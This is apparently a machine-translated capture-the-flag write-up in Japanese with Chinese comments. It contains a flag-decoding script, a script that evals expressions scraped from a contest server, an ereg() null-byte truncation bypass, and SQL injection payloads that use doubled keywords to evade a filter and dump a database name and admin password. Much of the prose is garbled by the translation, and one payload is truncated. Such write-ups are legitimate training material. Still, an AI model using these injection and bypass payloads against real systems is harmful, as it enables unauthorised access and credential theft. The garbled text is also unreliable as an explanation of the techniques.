質問にサインイン
スクリプトを使用してASCIIを文字列に変換する
#将列表转换Ascii为字符串
list=[102,108,97,103,58,102,108,97,103,95,105,115,95,118,101,114,121,95,101,97,115,121]
flag=''
for i in list:
k=chr(i)
flag+=k
print(flag)
3秒で数式を計算する
脚本
import requests
s=requests.Session()
url='http://gj.jasec.cn:8002/'
r=s.get(url)
res=r.content
a=res.find('<br/>')
b=res.find('=',a)
#找到我们要计算的式子的前后位置
num=res[a+5:b-17]
r=s.post(url,data={
'result':eval(num)})
print(num)
print(r.content)
<p>jactf{
7acfe4010bbe37096b6b51d4b29ee0b7}</p>
パスワードを推測する
この質問の原則は単純で、Webページのソースコードがプロンプトを表示し、index.php.txtの
ereg()関数を入力して脆弱性
構造
を切り捨てます。123%00#testaasafdですが、ここではキャプチャと送信に注意する必要があります。そうでない場合、%と#はURLによってエンコードされます。ついに旗
が出てくる旗:
曲がりくねった人生
確認コードを一緒に送信する必要がないという通知を受け取ると、エコーが表示され、質問を理解するのが非常に難しくなります。
1、
admin'oR/**/1='1
ユーザー名が壊れました:goodboy_g-60Hellow
goodboy_g-60Hellowor'/**/uniunionon/**/ selselectect/**/ database(),database(),database()#
データベースを公開
する:xiaowei はここで3つのdatabase()を使用します。また、エコーの位置を知らなくても、エコーの位置が2番目の位置であることを検出できます。
次の同様の展開テーブル名列名:
最後に、パスワードテーブルでパスワードを分解します。パスワードを二重に書き込むことを忘れないでください。
oodboy_g-60Hellowor'/**/uniunionon/**/ selselectect/**/ 1,passwoorrd ,3/**/from/**/admin#
パスワードは ajahas && * 44askldajaj